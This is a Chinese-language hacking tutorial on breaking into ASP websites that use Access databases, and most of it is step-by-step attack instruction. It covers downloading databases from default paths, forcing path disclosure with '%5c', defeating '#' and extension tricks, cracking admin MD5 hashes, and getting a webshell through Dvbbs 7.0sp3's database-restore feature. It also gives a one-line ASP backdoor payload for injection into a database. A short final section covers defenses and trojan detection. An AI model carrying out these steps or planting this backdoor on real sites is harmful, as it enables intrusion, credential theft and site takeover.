一、數(shù)據(jù)庫的獲取

　　數(shù)據(jù)庫對網(wǎng)站重要性不言而喻，那么黑客是通過什么手段得到網(wǎng)站數(shù)據(jù)庫的呢？

　　1.默認(rèn)的數(shù)據(jù)庫路徑

　　很多站長建站或論壇使用的都是現(xiàn)成的整站程序，這就造成了一個很大的安全隱患，即默認(rèn)的數(shù)據(jù)庫的路徑。雖然在這些程序的說明文檔中都提示修改數(shù)據(jù)庫的默認(rèn)路徑，但是仍有些安全意識不高的站長不屑于修改或者不會修改。這樣當(dāng)黑客在該網(wǎng)站的地址后輸入默認(rèn)數(shù)據(jù)庫的路徑，就可以輕易下載到數(shù)據(jù)庫。

　　2.暴庫顯示路徑

　　什么叫“暴庫”，簡單得說就是構(gòu)造特殊地址使網(wǎng)站程序運(yùn)行出錯，從出錯的信息中得到數(shù)據(jù)庫的路徑。暴庫并不是一門十分高深的技術(shù)，但是卻可以很快得找到數(shù)據(jù)庫路徑，而且成功率很高。要想進(jìn)行暴庫，首先需要對IE進(jìn)行設(shè)置，運(yùn)行IE,點擊“工具”菜單→“Internet選項”，切換到“高級”標(biāo)簽，將“顯示友好HTTP錯誤信息”前面的勾去掉，然后保存，這樣做是讓瀏覽器返回真實的錯誤信息，而不是類似505錯誤，405錯誤等經(jīng)過處理后的錯誤信息。找到一個存在暴庫漏洞的程序，例如較早版本的“動力文章系統(tǒng)”。打開““動力文章系統(tǒng)”的任意頁面，在IE地址欄中將該頁面地址出現(xiàn)的最后一個“/”替換為“%5c”，然后回車，如果暴庫漏洞存在，那么數(shù)據(jù)庫路徑將會馬上顯示出來。

　　3.防下載設(shè)置不夠嚴(yán)密

　　排除程序的原因，數(shù)據(jù)庫被下載很大一部分的原因是人為因素。有些站長已經(jīng)認(rèn)識到數(shù)據(jù)庫的重要性，雖然沒有修改默認(rèn)的路徑，但是將數(shù)據(jù)庫默認(rèn)的后綴名“mdb”改為了“asp”，這樣即使別人知道了數(shù)據(jù)庫的路徑，也無法在瀏覽器中進(jìn)行下載，而是直接在頁面中顯示數(shù)據(jù)庫的內(nèi)容，當(dāng)然都是一些亂碼。不過我們雖然無法在瀏覽器中下載，卻可以借用專用的下載軟件來實現(xiàn)數(shù)據(jù)庫的下載，或者將頁面中出現(xiàn)的所有內(nèi)容復(fù)制到一個文本文檔中，然后將這個文檔的后綴名改為“mdb”。

　　還有一種情況就是站長在數(shù)據(jù)庫的文件名中加入了“#”符號，例如原來的數(shù)據(jù)庫名為123.mdb，加入“#”號后變成“#123.mdb”，這樣當(dāng)我們在地址欄中直接輸入“http://www.***.com/#123.mdb”，是無法下載數(shù)據(jù)庫的，而是顯示“無法找到網(wǎng)頁”。這是因為瀏覽器的編碼格式會默認(rèn)將“#”號變?yōu)?ldquo;%23”，這樣就成了另外一個網(wǎng)址，當(dāng)然不可能下載到數(shù)據(jù)庫。那么我們反過來將“%23”替換為“#”，填入到網(wǎng)址中，數(shù)據(jù)庫不就可以正確下載了嗎?

　　二、破解數(shù)據(jù)庫中的管理員賬戶信息

　　得到數(shù)據(jù)庫后可以做什么？可以歸結(jié)為以下幾點：1.破解得到網(wǎng)站管理員的賬戶名與密碼；2.得到網(wǎng)站注冊用戶的信息；3.查看一些普通用戶無法查看到的資料。其中最有價值的就是保存在數(shù)據(jù)庫中的管理員賬戶信息。能成功得到管理員的賬戶密碼，我們就成功了一半。

　　得到網(wǎng)站的數(shù)據(jù)庫后（這里指的是Access數(shù)據(jù)庫），將數(shù)據(jù)庫的后綴名改為mdb，這樣我們就可以使用“Microsoft Office Access”來打開數(shù)據(jù)庫，通常在“admin”表中的就是管理員的賬戶信息。對于安全性不高的網(wǎng)站程序，管理員的賬戶名和密碼會以明文的形式顯示，這樣我們就省去了破解這一步。而絕大部分的網(wǎng)站程序都對管理員的密碼進(jìn)行了md5加密。md5是一種不可逆的加密算法，加密過的數(shù)據(jù)不可能再還原，因此我們必須通過暴力破解，來獲取密碼原文。

　　1.網(wǎng)站破解

　　破解md5的最快方法是通過專門的破解網(wǎng)站。登陸“http://www.xmd5.org/go_cn.htm”，點擊頁面中的“解密”鏈接進(jìn)行破解，將加密后的密文填入到文本框中，然后點擊“給我轉(zhuǎn)”，即可破解得到密碼，但是這類網(wǎng)站有其局限性，只能破解簡單的密碼，而遇到強(qiáng)悍的密碼就無能為力了。
　　2.軟件破解

　　除了通過網(wǎng)站破解，我們還可以使用專門的md5密碼破解工具。下載“md5crack”，無需安裝可直接運(yùn)行。運(yùn)行后可以看到兩個設(shè)置選項，分別是“密文設(shè)置”、“字符設(shè)置”，在“字符設(shè)置”中可以對破解形式進(jìn)行選擇。我們將需要破解的密文輸入到“密文設(shè)置”中的“破解單個密文”文本框中，軟件也可以同時破解多個密文，選中“破解多個密文”，點“設(shè)置”即可。

　　軟件對md5密文采用兩種破解方式，“暴力破解”和“字典破解”，前者采用猜解來得到密碼，后者是通過字典中已存在密碼與需要破解的密文進(jìn)行對比得出密碼。對于比較常見的密碼，使用“字典破解”的成功率是很高的。這里我們選擇“暴力破解”來演示。在“字符設(shè)置”中選中“使用字符集”，然后勾選“數(shù)字”，這樣就可以破解密碼為數(shù)字的密文，當(dāng)然我們也可以同時選中其他選項，不過破解時間會相應(yīng)變長。設(shè)置完成后點擊“開始”，即可開始破解工作。軟件的破解速度很快，對于不太復(fù)雜的密碼可以很快破解。

　　三、利用網(wǎng)站數(shù)據(jù)庫備份功能，得到webshell

　　由于各種網(wǎng)站程序的編寫越來越人性化，都在其后臺管理增加了數(shù)據(jù)庫的備份恢復(fù)功能，而這個功能卻被黑客敞開了大門，通過數(shù)據(jù)庫備份功能，我們可以輕易得得到網(wǎng)站的webshell，從而進(jìn)一步滲透。

　　我們以著名的動網(wǎng)論壇7.0sp3版本為例，假設(shè)我們已經(jīng)下載到了數(shù)據(jù)庫，并利用數(shù)據(jù)庫里的數(shù)據(jù)，破解得到了管理員的賬戶名和密碼。我們以管理員的身份登陸，在論壇發(fā)表一篇帖子，然后將我們的asp木馬以附件的形式上傳到服務(wù)器，這里需要將asp木馬的后綴名改為jpg，才能正常上傳。上傳成功后得到類似“UploadFile/2006-3/123.jpg”的地址。登陸論壇的后臺管理頁面，點擊頁面中的“恢復(fù)數(shù)據(jù)庫”選項，接著會出現(xiàn)“恢復(fù)數(shù)據(jù)庫”頁面，在其中的“備份數(shù)據(jù)庫路徑（相對）”中填入我們上傳附件成功后的地址，然后在“目標(biāo)數(shù)據(jù)庫路徑（相對）”中填入muma.asp，點擊“恢復(fù)數(shù)據(jù)”即可。這樣就會在論壇的根目錄中生成我們的muma.asp，直接輸入地址就可以得到webshell了。

　　四、數(shù)據(jù)庫的惡夢，C/S型asp木馬

　　所謂的C/S型asp木馬，就是客戶端和服務(wù)端分開的asp木馬。這種asp木馬運(yùn)作方式是：先將服務(wù)端代碼插入到網(wǎng)站的數(shù)據(jù)庫中，然后通過客戶端程序進(jìn)行連接，連接上后就可以像普通asp木馬那樣進(jìn)行操作。不過C/S木馬的運(yùn)行條件是目標(biāo)數(shù)據(jù)庫的后綴名必須已改為asp或asa，對于后綴名為mdb的數(shù)據(jù)庫則不起任何作用。下面我們通過C/S木馬來獲取一個webshell。

　　首先需要得到目標(biāo)網(wǎng)站的數(shù)據(jù)庫路徑，并且確認(rèn)數(shù)據(jù)庫的后綴名為asp或asa。然后來到網(wǎng)站任何可以將數(shù)據(jù)寫入數(shù)據(jù)庫的地方，將我們的asp木馬服務(wù)端“<%execute(request("cmd"))%>”（其中cmd是連接密碼，可以修改為自己的密碼）提交到網(wǎng)站上，這樣數(shù)據(jù)庫中就有了我們的木馬服務(wù)端。然后我們運(yùn)行目前較為成熟的C/S木馬“lanker微型asp后門”，在“木馬地址”中寫入網(wǎng)站數(shù)據(jù)庫的路徑，然后在“基本功能列表”中選擇“環(huán)境變量”，點“提交”就可以成功連接到服務(wù)端了。連接后可以在“基本功能列表中”選擇相應(yīng)的功能進(jìn)行操作，和一般的webshell無異。
　　五、打造數(shù)據(jù)庫的“銅墻鐵壁”

　　數(shù)據(jù)庫的防下載其實并不難，如果自己對網(wǎng)站所在的服務(wù)器有管理權(quán)，那么防下載只需在網(wǎng)站程序上做一下簡單的設(shè)置。如果網(wǎng)站是建立在虛擬主機(jī)上的，也只需編寫一個數(shù)據(jù)庫防下載的asp文件即可解決問題。

　　1.更改數(shù)據(jù)庫路徑

　　如果自己對網(wǎng)站所在的服務(wù)器有管理權(quán)，那么我們可以將網(wǎng)站程序和數(shù)據(jù)庫放在不同的目錄中，例如將網(wǎng)站程序放在c:/web文件夾中，將數(shù)據(jù)庫放在d:/data文件夾中，然后在網(wǎng)站程序中將數(shù)據(jù)庫的指向改為“d:/data/數(shù)據(jù)庫文件”即可。因為數(shù)據(jù)庫不在網(wǎng)站目錄下，因此不存在被下載的問題。

　　2.編寫防下載asp文件

　　如果網(wǎng)站是建立在虛擬主機(jī)上的，可以在數(shù)據(jù)庫中添加防下載表。首先將網(wǎng)站數(shù)據(jù)庫改為asp后綴，然后用記事本打開“數(shù)據(jù)庫防下載.asp”（本文相關(guān)軟件包中有提供），將第二行中的數(shù)據(jù)庫地址改為自己網(wǎng)站的數(shù)據(jù)庫地址，然后將這個asp文件上傳到網(wǎng)站上，用瀏覽器執(zhí)行一次即可。文件執(zhí)行完畢后會在數(shù)據(jù)庫中添加防下載表，這樣當(dāng)輸入數(shù)據(jù)庫地址時會出現(xiàn)“無法顯示該頁”的錯誤信息。

　　3.入侵后的補(bǔ)救措施

　　黑客利用下載數(shù)據(jù)庫入侵后，通常會留下一些asp木馬，作為后門控制網(wǎng)站。因此如果發(fā)現(xiàn)網(wǎng)站被入侵，檢測asp木馬是否存在也是一件十分重要的事。對于asp木馬的檢測，可以使用“思易asp木馬追捕”，它可以像殺毒軟件一樣通過特征碼來查找存在于網(wǎng)站中的asp木馬。因此有“越軌操作”的asp文件都會被其列入黑名單。同時對于每個asp文件所擁有的權(quán)限都將以列表的形式顯示，具有危險性的asp文件一目了然。